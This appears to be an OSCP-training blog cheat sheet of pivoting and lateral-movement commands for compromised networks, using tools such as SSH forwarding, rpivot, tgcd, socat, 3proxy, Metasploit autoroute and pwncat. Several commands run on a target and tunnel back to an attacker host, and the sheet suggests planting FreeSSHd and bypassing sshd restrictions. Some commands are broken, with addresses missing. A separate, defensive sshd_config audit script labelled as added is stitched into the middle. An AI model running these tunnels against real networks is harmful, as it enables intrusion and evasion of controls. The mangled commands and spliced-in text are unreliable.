🥷 Cracking the OSCP certification: 15 tools for Pivoting and Lateral Movement

Learn several techniques to succeed in your post-exploitation phase!

#1: Pivoting with rinetd

rinetd -f -c rinetd.conf
# rinetd.conf

# bindaddress bindport connectaddress connectport
$PUBLICIP        80          $IP          80

#2: Pivoting with plink.exe

plink.exe is the command-line SSH client from PuTTY, i.e. ssh for Windows:

plink -l root -pw pass -R 3389: $IP -P 80 -N

#3: Pivoting with SSH / OpenSSH

SSH local port forwarding ("proxy", run on the attacker machine)

Local port → remote server

ssh -L <localhost port>:<remote IP>:<remote port> $IP

Remote redirection: SSH remote port forwarding ("reverse shell", run on a compromised machine)

ssh -R <server side port>:<localhost>:<local port> $IP

With ssh -L / -R the locally mapped ports are bound to localhost only; to expose them on the eth0/tun0 interfaces, use tgcd or socat!

Open question: how do you forward a local Apache running on the attacker machine into the private LAN through the pivot?

Dynamic port forwarding (SOCKS4/5 proxy)

ssh -D <local port> $IP

#4: Pivoting with VPN over SSH

# /etc/ssh/sshd_config (on the server)

PermitRootLogin yes
PermitTunnel yes

ssh user@server -w any:any

Routing is not automatic: add the routes and the gateway on both ends. On the server, also enable IP forwarding.
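The two sshd_config lines above are exactly what a hardening review looks for. This is an added example, not from the original post: a small Python audit that parses an sshd_config and reports the directives that make a host usable as a pivot (PermitRootLogin, PermitTunnel, plus AllowTcpForwarding and GatewayPorts, which govern the -L/-R/-D forwards from #3). It assumes OpenSSH semantics (first occurrence of a keyword wins, keywords are case-insensitive, anything after a Match line is conditional) and the OpenSSH defaults listed in the code; the sample config is constructed.

```python
import re

# OpenSSH defaults for the directives this audit cares about
DEFAULTS = {
    "permitrootlogin": "prohibit-password",
    "permittunnel": "no",
    "allowtcpforwarding": "yes",
    "gatewayports": "no",
}

# (keyword, values that enable pivoting through this host, explanation)
CHECKS = [
    ("permitrootlogin", {"yes"}, "root may log in with a password"),
    ("permittunnel", {"yes", "point-to-point", "ethernet"}, "tun/tap devices allowed (ssh -w)"),
    ("allowtcpforwarding", {"yes", "all", "local", "remote"}, "TCP forwarding allowed (ssh -L/-R/-D)"),
    ("gatewayports", {"yes", "clientspecified"}, "remote forwards may bind non-loopback addresses"),
]

def parse_sshd_config(text):
    """Effective global settings as {lowercase keyword: lowercase value}."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blanks
        if not line:
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)  # 'Key value' or 'Key=value'
        key = parts[0].lower()
        if key == "match":
            break  # everything after Match is conditional; out of scope here
        if len(parts) == 2 and key not in settings:
            settings[key] = parts[1].strip().lower()   # first occurrence wins
    return settings

def audit(text):
    """Return (keyword, effective value, explanation) for each risky setting."""
    settings = parse_sshd_config(text)
    return [(key, settings.get(key, DEFAULTS[key]), msg)
            for key, risky, msg in CHECKS
            if settings.get(key, DEFAULTS[key]) in risky]

# Constructed sample mirroring the two lines section #4 adds to sshd_config
SAMPLE = """
PermitRootLogin yes
PermitTunnel yes
AllowTcpForwarding no
Match User backup
    PermitTunnel no
"""

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print("%-20s %-18s %s" % finding)
```

Note that an empty config still yields one finding, because OpenSSH enables TCP forwarding by default.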

#5: Pivoting with proxychains

From the compromised machine (hax0r user):

ssh -f -N -R 2222: root@kali
ssh -f -N -D -p 2222 [email protected]

Edit /etc/proxychains.conf

socks4   8080

proxychains only relays TCP connect() traffic, which is why the scan below uses -sT. It is also incredibly slow!

proxychains nmap --top-ports=20 -sT -Pn $IP/24

For proxying DNS, edit /usr/lib/proxychains3/proxyresolv

#6: Pivoting with FreeSSHd.exe

Good to install on the target for pivoting!!

Download from here: http://www.freesshd.com/freeSSHd.exe

#7: Pivoting with tinyproxy


#8: Pivoting with rpivot

  • Reverse SOCKS proxy, the opposite of ssh -D; supports Windows credentials for use with a corporate proxy

  • The server is started on the pentester's machine and listens for incoming connections from the client.

  • Written in Python, with no dependencies

Pentester machine (listener):

python server.py --proxy-port 1080 --server-port 9900 --server-ip $IP

Target machine (if egress traffic is not firewalled):

python client.py --server-ip $IP --server-port 9900

#9: Pivoting with 3proxy

On the target (can bypass the target's sshd TCP forwarding restrictions):

For SOCKS proxy:

# 3proxy.config

socks -p1080 # socks proxy

For port redirection:

# 3proxy.config

tcppm <localport> <targethost> <targetport>


./3proxy 3proxy.config &

#10: Pivoting with tgcd

tgcd is a simple Unix network utility that extends the reachability of TCP/IP based network services beyond firewalls. It can also be used by network analysts and security experts for penetration testing and for analyzing the security of their network.

This program has 3 different modes:

  • CC (ConnectConnect)

  • LL (ListenListen)

  • PF (PortForwarder)

CC and LL nodes are used together to provide access to a service inside a Local Area Network from the external network; the PF node is only a simple port forwarder.

On the attacker machine (VPN is not supported):

tgcd -L -p 9090 -q 4000 [-e tap0] -n -g 10

On the target:

tgcd -C -s $IP:8080 -c $ATTACKER:4000 -n -g 10

#11: Pivoting with Metasploit

Method 1: Using Socks

msf> use auxiliary/server/socks4a
msf> run -j

Method 2: Using autoroute

meterpreter> run autoroute -s $IP/24
meterpreter> run autoroute -p

Method 3: Manual route

msf exploit(handler) > route add $IP 1

#12: Pivoting with ssf

On the target:

ssfd -p 11111

On the attacker machine:

ssf -D 22222 -p 11111 $TARGET_IP

#13: Pivoting with socat

On the inside-LAN server:

socat -d -d -d -t5 tcp:$IP:80,forever,intervall=10,fork tcp:localhost:80

On the outside-LAN client:

socat -d -d -d tcp-l:80,reuseaddr,bind=,fork tcp-l:80,bind=$IP,reuseaddr,retry=10

Connect with the outside client.

  • Socat SSH encapsulation into SSL

On the server:

socat ssl-l:443,reuseaddr,fork,cert=./server.pem,verify=0 exec:'/usr/sbin/sshd -i'

On the client:

ssh -o ProxyCommand="socat - 'ssl,verify=0|proxy-connect:%h:443|tcp:proxy:8080'" $SERVER

  • Socat SSH deception (bounces back to the client's own SSH server)

socat -d -d TCP-L:22,reuseaddr,fork SYSTEM:"nc \$SOCAT_PEERADDR 22"


#14: sshuttle

sshuttle is where transparent proxy meets VPN meets ssh. It can be downloaded from https://github.com/sshuttle/sshuttle

You must have root access on the local machine, but you can have a normal account on the server.

sshuttle -r [email protected]

Here the host is a machine inside our current network running an SSH server that we log in to with the user pivotmachine, and the network is the subnet we are redirecting from the SSH server machine to ours.

More info for sshuttle: https://sshuttle.readthedocs.io/en/stable/manpage.html

#15: pwncat

pwncat is netcat on steroids, mainly used for reverse and bind shells.

Nonetheless, it can also be used for pivoting, with a syntax similar to ssh:

Local port forward (forward remote port 3306 to local port 5050):

pwncat -L example.org 3306

Connect to a remote MySQL server (remote port 3306), then connect to another pwncat/netcat server and bridge the traffic between them:

pwncat -R example.org 3306

Reference: https://github.com/cytopia/pwncat
